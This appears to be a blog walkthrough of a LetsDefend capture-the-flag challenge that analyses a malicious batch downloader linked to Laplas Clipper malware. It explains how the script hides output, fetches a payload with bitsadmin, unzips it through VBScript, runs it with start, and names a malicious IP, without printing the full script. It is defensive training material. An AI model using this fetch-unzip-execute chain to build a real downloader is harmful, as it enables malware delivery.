LetsDefend— Batch Challenge Walkthrough
Investigating a Malicious Batch Script with Notepad++ & Microsoft Learn
Introduction:
Have you ever wanted to analyze a batch file to determine if it malicious or safe? If this topic sounds interesting to you, you’ve stumbled on the right blog!
Welcome to my weekly walkthrough. This week, we’re tackling the Batch Downloader from LetsDefend! This challenge has us security analysts dissecting the content of a malicious batch file (.bat) to better understand what it does.
To perform the investigation, we’ll use Notepad++, a powerful text editor, to examine the file. We’ll also leverage Microsoft Learn documentation to cross-reference our findings, giving us valuable background and context to fully understand the script’s behavior. Sounds like a fun time, right? Let’s get to it!
And hey, if you find this walkthrough helpful in leveling up your skills or getting you through a tricky question, please give it a clap! Your feedback lets me know that I helped you out on your security journey. Thanks for reading!
Challenge Link: https://app.letsdefend.io/challenge/batch-downloader
Challenge Scenario:
A malicious batch file has been discovered that downloads and executes files associated with the Laplas Clipper malware. Analyze this batch file to understand its behavior and help us investigate its activities.
Question 1: What command is used to prevent the command echoing in the console?
Let’s kick off our investigation! Before diving into the challenge file, it’s always a smart idea to understand what tools are available to us for analysis. To check what we have, we can open the Tools folder on the Desktop of the analysis virtual machine.
For this challenge we will be analyzing a Batch File (.bat) which is a type of command shell script that is used in Windows environments. As the batch file can be opened and edited in a plaintext editor, we will be using Notepad++ for the analysis.
Now, let’s navigate to the ChallengeFile folder and extract the 1.zip archive. Inside will be another nested file, go ahead and extract that one too so that we can access the malicious .bat file.
Finally, let’s open the batch file with Notepad++ so we can begin analyzing the contents.
To answer Question 1, we’re looking for the command that prevents echoing to the console. Focusing on Line 1 in the script we’ll see the following:
@echo off
This parameter prevents all of the commands in the script from being displayed to the console which will obfuscate what the script is doing.
Question 2: Which tool is used to download a file from a specified URL in the script?
Okay, to answer Question 2, we’re going to focus on Line 2 of the script.
Quickly scanning Line 2, we see some evidence of download activity including a URL, so we’re looking in the correct spot.
Let’s getting a better idea of what the bitsadmin command is and how it can be used to perform download jobs. Below is a description of Bitsadmin from Microsoft Learn:
Bitsadmin is a command-line tool used to create, download or upload jobs, and to monitor their progress. The bitsadmin tool uses switches to identify the work to perform.
So, Bitsadmin uses these switches with the syntax below to perform transfer jobs:
bitsadmin /transfer <name> [<type>] [/priority <job_priority>] [/ACLflags <flags>] [/DYNAMIC] <remotefilename> <localfilename>
With this bit of background, we can now confirm that bitsadmin is the correct tool being used to download the file. Let’s check our work and continue the investigation!
Question 3: What is the priority set for the download operation in the script?
Let’s continuing dissecting the bitsadmin command on line 2 and focus on the switches used.
Referring to the bitsadmin syntax from the previous question, we will see a /priority switch. According to the Microsoft Learn reference, there are a few options to set the priority of the download job:
priorityOptional. Sets the priority of the job, including:
FOREGROUND
HIGH
NORMAL
LOW
In the case of this script, the job is set to the highest priority, FOREGROUND.
Question 4: Which command is used to start localization of environment changes in the script?
To answer Question 4, we need to locate a command for localization. Let’s take a closer look at line 3 — setlocal.
Going back to Microsoft Learn for reference, we can confirm that the setlocal command “starts localization of environment variables in a batch file.”
Question 5: Which IP address is used by malicious code?
Fortunately, locating the answer to Question 5 is straight forward — an IP address is readily visible in line 2.
While this is the only IP address in the batch script, let’s gather some additional threat intelligence by checking it against VirusTotal to see if we can get any hits that it’s malicious:
Okay, we’ve got a number of hits that this IP address is malicious and even some community reports attributing it to the Laplas Clipper malware mentioned in the challenge scenario!
Question 6: What is the name of the subroutine called to extract the contents of the zip file?
All right, back to analyzing the script. This time, we’re going to focus on lines 5 & 10 since we are looking for an unzip operation to extract the file downloaded from the malicious IP from Question 5.
If we look at line 5 there is a call to :UnZipFile and then in line 10, we’ll see the parameters of the subroutine.
Without dissecting each line, we can infer that this is correct subroutine that extracts the contents of the .zip file downloaded from the malicious IP.
Question 7: Which command attempts to start an executable file extracted from the zip file?
Based on what we learned in the previous question, we know that after download, the batch script extracts the contents of the retrieved .zip file.
To answer Question 7, we need to identify the command which then runs the executable (.exe) extracted from the archive. Let’s point our attention to line 7 with the start command.
Referencing Microsoft Learn the start command “starts a separate Command Prompt window to run a specified program or command.” In our example, the script uses start to launch the malicious executable.
Now that we have confirmed what start does, we can copy all of line 7 to answer Question 7.
Question 8: Which scripting language is used to extract the contents of the zip file?
We’ve made it to the last question! To answer Question 8, we’re going to revisit the UnZipFile subroutine that we looked at in Question 7.
There are a couple of clues here that point us to the correct answer.
- In line 11 we see the vbs variable is setting a path ending with the .vbs extension.
- The second clue is the command in line 22, cscript. Cscript is a command typically used to run Windows Script files, like .vbs files.
But what is a .vbs file then? It is a file extension for VBScript. VBScript is an older scripting language that is used to automate tasks on Windows systems.
In the malicious script we are analyzing, it is used to extract the contents of the .zip file.
Conclusion:
And there we have it! We’ve successfully analyzed the malicious batch file to and dug into the details of how it works. With the help of Notepad++, we’ve identified how the script downloads a second-stage payload, detailed where it downloads from, how it’s extracted, and how it is executed.
With our objectives completed, let’s close out this walkthrough of the Batch Downloader challenge!
A big thank you to LetsDefend for another educational (and fun) challenge! While this challenge is intended for beginners, it’s always extremely valuable to brush up on our research skills. Using Microsoft Learn to add context helped me gain a much better understanding of how this script works and various areas that we could improve our defenses against these types of attacks.
Again, if you found this walkthrough helpful in leveling up your skills or getting you through a tricky question, please give it a clap! Your feedback lets me know that I helped you out on your security journey. We’re in this together! Thanks for the support!
Until next week’s challenge — stay curious and be safe out there!
Tools & References:
Microsoft Learn (Windows Commands): https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/windows-commands
Notepad++: https://notepad-plus-plus.org/
Microsoft Learn (Echo): https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/echo
Microsoft Learn (Bitsadmin): https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/bitsadmin
Microsoft Learn (Bitsadmin Transfer): https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/bitsadmin-transfer
Microsoft Learn (setlocal): https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/setlocal
VirusTotal: https://www.virustotal.com/gui/ip-address/193.169.255.78/detection
Microsoft Learn (start): start | Microsoft Learn
Microsoft Learn (cscript): Cscript | Microsoft Learn
Wikipedia (VBScript): VBScript — Wikipedia